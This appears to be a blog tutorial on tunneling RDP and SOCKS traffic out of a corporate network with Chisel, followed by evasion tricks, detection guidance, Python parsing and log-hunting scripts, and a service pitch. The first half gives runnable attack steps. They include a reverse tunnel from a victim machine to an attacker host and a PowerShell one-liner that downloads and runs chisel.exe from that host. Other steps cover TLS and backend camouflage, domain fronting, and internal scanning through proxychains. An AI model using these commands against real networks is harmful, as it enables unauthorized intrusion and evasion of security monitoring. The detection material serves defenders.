Bypassing Corporate Firewalls with Chisel for RDP Access

Scenario Overview:

A corporate network restricts inbound connections but allows outbound traffic (e.g., HTTP, HTTPS). We need to access an internal RDP (3389) server behind the firewall from an external attacker-controlled machine.

Constraints:

  • Firewall blocks inbound RDP, SSH, and VPN.

  • Only outbound HTTP/HTTPS is allowed.

  • Direct reverse shells are detected.

Getting in anyway: Chisel (TCP Tunneling over HTTP)

Chisel carries an SSH-encrypted tunnel inside a WebSocket connection over plain HTTP or HTTPS. Because the victim initiates the connection outbound on a permitted port, the firewall's inbound rules never come into play.

Step-by-Step Exploitation

1. Set Up the Chisel Server (Attacker Machine)

On the attacker machine (public IP: 10.10.10.10), start the Chisel server in reverse mode so that the victim can initiate the connection:

./chisel server -p 8080 --reverse

  • Listens on port 8080. This is the alternate-HTTP port, which many egress filters treat differently from 80/443; given the stated constraint that only HTTP/HTTPS is allowed out, 80 or 443 is the safer choice, and that is where the evasion section below moves the listener.

  • --reverse allows clients to request R: remotes, so the forwarded ports are opened on the server (attacker) rather than on the client (victim).


2. Victim Machine (Internal Network) Connects Back

On the internal Windows machine (behind the firewall), run:

.\chisel.exe client 10.10.10.10:8080 R:3389:localhost:3389

The R: prefix asks the server to open the listener: the attacker host now listens on 0.0.0.0:3389, and every connection it receives is relayed through the tunnel to the victim's own port 3389. Back on the attacker machine, the server log shows the new session and the reverse listener for port 3389.

An RDP client pointed at 127.0.0.1:3389 on the attacker machine now reaches the victim's RDP service.

If we want a "full" connection into the network rather than a single forwarded port, we use Chisel's SOCKS feature: the client requests the remote R:socks, which opens a SOCKS5 proxy on the attacker side (port 1080 by default) whose outbound connections are made from the victim machine.

With proxychains configured to use that proxy (socks5 127.0.0.1 1080 in proxychains.conf), our own tools (or malware) run against the internal network as if they were on the victim's machine.

To do this, we tunnel nmap through proxychains so that we can scan the internal network. Use a TCP connect scan (-sT) and skip host discovery (-Pn): SYN scans and ICMP probes are raw packets and cannot travel through a SOCKS proxy, so without those options the scan reports everything as down.
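Because the R: prefix decides which side opens the listener and which side the traffic leaves from, it helps to be able to read a remote spec precisely before typing it. The following is an added example, not code from this post or from the Chisel project: a small interpreter for Chisel remote specs written against the grammar and defaults documented in Chisel's README (local-host 0.0.0.0, local-port equal to remote-port, SOCKS on 1080). Those defaults are an assumption to confirm against chisel client --help for the version you deploy, and the hostnames in the demo are placeholders.

```python
"""Interpret Chisel "remote" specs, i.e. the arguments after the server URL.

Added example, not Chisel's own code. It follows the grammar in Chisel's README:

    [R:]<local-host>:<local-port>:<remote-host>:<remote-port>[/udp]
    [R:][<local-host>:][<local-port>:]socks

  - local-host defaults to 0.0.0.0, local-port defaults to remote-port,
    remote-host defaults to 0.0.0.0 (loopback of the side that dials out);
  - plain remote: the *client* listens and the *server* dials out;
  - R: remote (server started with --reverse): the *server* listens and
    the *client* dials out;
  - "socks" replaces remote-host:remote-port and opens a SOCKS5 proxy
    (default port 1080) instead of a fixed forward.
The defaults are an assumption taken from the README; IPv6 bracket forms
are not handled.
"""
from dataclasses import dataclass
from typing import Optional

SOCKS_DEFAULT_PORT = 1080


def _is_port(tok: str) -> bool:
    return tok.isdigit() and 0 < int(tok) < 65536


@dataclass(frozen=True)
class Remote:
    reverse: bool
    local_host: str
    local_port: int
    remote_host: Optional[str]  # None for socks remotes
    remote_port: Optional[int]
    socks: bool
    udp: bool

    @property
    def listener_side(self) -> str:
        # R: flips which end opens the listening socket.
        return "server" if self.reverse else "client"

    @property
    def exit_side(self) -> str:
        return "client" if self.reverse else "server"

    def describe(self) -> str:
        proto = "udp" if self.udp else "tcp"
        where = f"{self.listener_side} listens on {self.local_host}:{self.local_port}/{proto}"
        if self.socks:
            text = f"{where} as a SOCKS5 proxy; proxied connections exit from the {self.exit_side}"
        else:
            text = f"{where}; traffic exits from the {self.exit_side} to {self.remote_host}:{self.remote_port}"
        return text + (" (server must run with --reverse)" if self.reverse else "")

    def proxychains_line(self) -> Optional[str]:
        """proxychains.conf line for tools run on the listening host; None unless SOCKS."""
        if not self.socks:
            return None
        host = "127.0.0.1" if self.local_host in ("0.0.0.0", "::") else self.local_host
        return f"socks5 {host} {self.local_port}"


def parse_remote(spec: str) -> Remote:
    s = spec.strip()
    reverse = s.startswith("R:")
    if reverse:
        s = s[2:]
    udp = s.endswith("/udp")
    if udp:
        s = s[: -len("/udp")]
    parts = s.split(":")
    if not s or "" in parts or len(parts) > 4:
        raise ValueError(f"malformed remote: {spec!r}")
    socks = parts[-1] == "socks"
    if socks and udp:
        raise ValueError("socks remotes are TCP only")

    local_host = local_port = remote_host = remote_port = None
    # Resolve from the right, as Chisel does: the first port seen is the
    # remote port (and provisionally the local port); later ports and hosts
    # fill the local side. This keeps forms like "3000:host:80" unambiguous.
    for tok in reversed(parts[:-1] if socks else parts):
        if _is_port(tok):
            if not socks and remote_port is None:
                remote_port = int(tok)
            local_port = int(tok)
        elif not socks and remote_host is None:
            remote_host = tok
        elif local_host is None:
            local_host = tok
        else:
            raise ValueError(f"too many host parts in {spec!r}")
    if not socks and remote_port is None:
        raise ValueError(f"remote port missing in {spec!r}")

    if socks:
        local_port = local_port or SOCKS_DEFAULT_PORT
    else:
        local_port = local_port or remote_port
        remote_host = remote_host or "0.0.0.0"
    return Remote(reverse, local_host or "0.0.0.0", local_port, remote_host, remote_port, socks, udp)


if __name__ == "__main__":
    # The remotes used in this post, plus a couple of other README forms.
    for spec in ("R:3389:localhost:3389", "R:socks", "5000:socks", "R:5353:1.1.1.1:53/udp"):
        r = parse_remote(spec)
        print(f"{spec:24} -> {r.describe()}")
        if r.proxychains_line():
            print(f"{'':24}    proxychains.conf: {r.proxychains_line()}")
```

The parser deliberately mirrors Chisel's right-to-left resolution, so a spec such as 3389:localhost:3389 without the R: prefix comes out as "client listens", which is exactly the mistake that silently opens a port on the victim instead of the attacker.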


As this shows, Chisel is an effective way into a corporate network whose firewall permits outbound connections but no inbound ones, where traditional techniques such as a direct reverse shell or aggressive scanning from outside would be detected. It is quieter than those because, on the wire, it is a single long-lived WebSocket connection over HTTP or HTTPS. It is not invisible, though; the detection section below covers what it still leaves behind.

Advanced Evasion Techniques & Detection Methods for Chisel Tunneling


Evasion Techniques (Making Chisel Stealthier)

1. Protocol Camouflage


Chisel always speaks SSH inside a WebSocket over HTTP; what you can vary is the outer layer, and that is where the evasion happens:


Use HTTPS Instead of Plain HTTP:

./chisel server -p 443 --reverse --tls-key key.pem --tls-cert cert.pem

  • The tunnel now looks like any other TLS session to port 443. Note that --host sets the interface to bind, not a domain name; point the DNS record for mylegitdomain.com at the server and have the client connect to https://mylegitdomain.com.

  • Requires a TLS certificate. With a self-signed one the client must pass --tls-skip-verify, and the self-signed certificate itself is something TLS-inspecting proxies flag. With a real domain, chisel server --tls-domain mylegitdomain.com obtains a Let's Encrypt certificate automatically (this requires port 443).


2. Hiding in Plain Sight (--backend) and Using the Corporate Proxy:

./chisel server -p 443 --reverse --backend https://www.mylegitdomain.com

  • Chisel traffic is already WebSocket; there is no quieter mode to switch on. What --backend (called --proxy in older Chisel releases) adds is that any non-Chisel HTTP request to the server is forwarded to a real website, so an analyst who browses to the callback address sees ordinary content instead of a 404.

  • On the victim side, the client can be sent through the corporate HTTP proxy with --proxy http://proxy.corp.com:8080 placed before the server URL; the tunnel then rides a CONNECT request, which is often the only route out when direct outbound is blocked.

  • WebSocket upgrades are common in web applications (live chat, real-time dashboards and other streaming features), so a long-lived upgraded connection is not unusual by itself.


Traffic Obfuscation

  • Prefer a SOCKS remote over one port forward per target:

    • From the network's point of view SOCKS is invisible either way, because it runs inside the encrypted tunnel. The gain is operational: a single R:socks remote reaches any internal host and port without a new forward (and a new server log line) per target. The server's --socks5 flag is only needed when clients should use a SOCKS proxy on the server side; reverse SOCKS needs nothing beyond --reverse.

  • Keep the heartbeat quiet:

.\chisel.exe client --keepalive 30s --max-retry-interval 60s 10.10.10.10:8080 R:3389:localhost:3389

  • --keepalive sets how often the client sends an SSH keepalive over the idle tunnel (the default is 25s); --max-retry-interval caps the reconnect backoff after a dropped connection. Client options must come before the server address, because Chisel uses Go's standard flag parsing, which stops at the first positional argument.

  • These settings only shape the idle pattern. The bulk of what an IDS sees is whatever you push through the tunnel, so a full nmap sweep through it is still bursty.

3. Download, Run, Delete (Not Actually Fileless)

The snippet often passed around as "in-memory" execution still writes the binary to disk:

iwr http://10.10.10.10/chisel.exe -OutFile $env:TEMP\chisel.exe;
& $env:TEMP\chisel.exe client 10.10.10.10:8080 R:3389:localhost:3389

Deleting it afterwards:

rm $env:TEMP\chisel.exe -Force

This removes the file but not the evidence: the Invoke-WebRequest download, the file creation in %TEMP% and the process start are all recorded by EDR or Sysmon before the delete runs, and Windows will not let you delete the executable while the client process is still running from it. Treat this as a drop-run-delete pattern, not as fileless execution.

4. Domain Fronting (If Cloud Services Are Allowed)

Domain fronting is a client-side trick, not a server option: the TLS SNI names a high-reputation domain on the same CDN, while the HTTP Host header names the attacker's CDN distribution, so a proxy that only reads the SNI sees the trusted name. Chisel exposes both knobs on the client (trusted-site.example below is a placeholder for such a domain):

    .\chisel.exe client --sni trusted-site.example --hostname myrealcdn.cloudfront.net https://trusted-site.example R:3389:localhost:3389

  • The server is an ordinary Chisel server sitting behind the CDN distribution; --host on the server only chooses the local bind interface and has nothing to do with the CDN name.

  • Major CDNs began refusing mismatched SNI/Host pairs in 2018 (CloudFront and Google among them), so verify that the specific provider still permits it before building an operation around it.

Countermeasures (Stopping Chisel in Enterprise Networks)

1. Network Hardening

  • Block outbound traffic to uncommon ports (8080, 4444, etc.) and force the rest through an authenticating proxy. The evasion section above lands the tunnel on 443, so port filtering alone is not enough.

  • Allow only approved destinations (domain allow-listing on the proxy) so that callbacks to attacker infrastructure fail, and inspect TLS where policy permits so that the WebSocket handshake is visible to the proxy.

2. Endpoint Controls

  • Restrict unauthorized executables (AppLocker or WDAC); PowerShell Constrained Language Mode blocks the download-and-run one-liner above.

  • Monitor executable creation and execution from temporary paths (C:\Windows\Temp\, $env:TEMP).

3. Behavioral Analysis

  • A Chisel tunnel is one long-lived WebSocket connection, not a rapid succession of connections; the keepalives travel inside it. Alert on HTTP 101 upgrades to rarely seen external hosts that stay open for hours, on upgrades performed by Go's default User-Agent, and, where the proxy sees the handshake, on Sec-WebSocket-Protocol values beginning with chisel-.

  • Detect native port forwarding (e.g., netsh interface portproxy) as a separate technique; Chisel does not use it, but an attacker without a tunnel binary will.
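To make the behavioral points above concrete, and to show what survives the evasion tweaks from the previous section, here is an added example that is not from this post or from the Chisel project: a small Python hunt over web-proxy logs that scores each finished connection against the indicators listed. The log lines and their JSON-lines schema are constructed for the example; the field names are assumptions to map onto your own proxy or Zeek http.log, and the hostnames (mylegitdomain.com from this post, the rest placeholders) are likewise assumed.

```python
"""Hunt for Chisel tunnels in web-proxy logs.

Added example, not from the post or the Chisel project. SAMPLE_LOG is
constructed: one JSON object per finished connection with assumed fields
src, host, method, path, status, user_agent, ws_protocol (the value of
Sec-WebSocket-Protocol, if the proxy records it) and duration_s.

Indicators, strongest first:
  1. Sec-WebSocket-Protocol beginning with "chisel-": the client sends
     "chisel-v3" and the server only accepts its own protocol string, so
     it cannot be renamed without patching both ends. Visible only in
     plaintext HTTP or after TLS termination.
  2. An HTTP 101 upgrade issued by Go's default User-Agent
     ("Go-http-client/1.1"), which Chisel sends unless --header overrides it.
  3. An upgrade on path "/" to a host that receives no other request.
  4. An upgraded connection that stays open for more than an hour.
"""
import json
from collections import Counter

SAMPLE_LOG = """\
{"src": "10.0.5.23", "host": "mylegitdomain.com", "method": "GET", "path": "/", "status": 101, "user_agent": "Go-http-client/1.1", "ws_protocol": "chisel-v3", "duration_s": 21600}
{"src": "10.0.5.23", "host": "cdn-assets.example.net", "method": "GET", "path": "/", "status": 101, "user_agent": "Go-http-client/1.1", "ws_protocol": "", "duration_s": 14400}
{"src": "10.0.7.9", "host": "wss-primary.slack.com", "method": "GET", "path": "/link/?ticket=abc", "status": 101, "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "ws_protocol": "", "duration_s": 7200}
{"src": "10.0.7.9", "host": "wss-primary.slack.com", "method": "GET", "path": "/health", "status": 200, "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "ws_protocol": "", "duration_s": 0}
{"src": "10.0.7.9", "host": "www.example.com", "method": "GET", "path": "/index.html", "status": 200, "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "ws_protocol": "", "duration_s": 1}
{"src": "10.0.8.1", "host": "metrics.internal-tool.example", "method": "GET", "path": "/ws", "status": 101, "user_agent": "Go-http-client/1.1", "ws_protocol": "", "duration_s": 30}
"""

SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2}
LONG_LIVED_SECONDS = 3600


def parse_log(text):
    """One dict per non-empty JSON line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def assess(event, host_counts):
    """Return the indicators that fire for one connection."""
    reasons = []
    proto = (event.get("ws_protocol") or "").lower()
    upgraded = event.get("status") == 101
    if proto.startswith("chisel-"):
        reasons.append(f"Sec-WebSocket-Protocol {proto}")
    if upgraded and (event.get("user_agent") or "").startswith("Go-http-client"):
        reasons.append("WebSocket upgrade from Go default User-Agent")
    if upgraded and event.get("path") == "/" and host_counts[event["host"]] == 1:
        reasons.append("upgrade on / to a host with no other requests")
    if upgraded and event.get("duration_s", 0) > LONG_LIVED_SECONDS:
        reasons.append(f"upgraded connection open for {event['duration_s']}s")
    return reasons


def severity(reasons):
    """The protocol header alone is conclusive; otherwise require two weak signals."""
    if any(r.startswith("Sec-WebSocket-Protocol") for r in reasons):
        return "high"
    return "medium" if len(reasons) >= 2 else "low"


def hunt(text, min_severity="medium"):
    """Score every connection in the log; return findings at or above min_severity."""
    events = parse_log(text)
    host_counts = Counter(e["host"] for e in events)
    findings = []
    for e in events:
        reasons = assess(e, host_counts)
        if not reasons:
            continue
        sev = severity(reasons)
        if SEVERITY_RANK[sev] >= SEVERITY_RANK[min_severity]:
            findings.append({"src": e["src"], "host": e["host"], "severity": sev, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG, min_severity="low"):
        print(f"{f['severity']:6} {f['src']} -> {f['host']}: {'; '.join(f['reasons'])}")
```

On the constructed log the plaintext Chisel session scores high on the header alone, the TLS-wrapped one whose header the proxy never saw still scores medium on the combination of Go User-Agent, bare "/" path and multi-hour lifetime, while the Slack WebSocket and the internal Go client each trip only one weak signal and stay below the reporting threshold. If your proxy does not log Sec-WebSocket-Protocol, a network IDS rule on that HTTP header in the upgrade request gives the same high-confidence hit for any traffic it can see in the clear.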


Comprehensive protection requires layered security controls. For organizations needing tailored defense solutions, I offer:

Enterprise-Grade Countermeasures

  1. Custom Network Traffic Profiling

    • Behavioral analysis of encrypted HTTP/WebSocket traffic

    • Machine learning models tuned to organization’s specific environment

  2. Active Counter-Tunneling Systems

    • Real-time tunnel disruption technology

    • Protocol-level interference for unauthorized proxies

  3. Hardened Endpoint Protection

    • Memory-based execution monitoring

    • Weaponized decoy tunnels for attacker identification

  4. Live Threat Hunting

    • 24/7 SOC monitoring for tunnel artifacts

    • Attack surface reduction through micro-segmentation
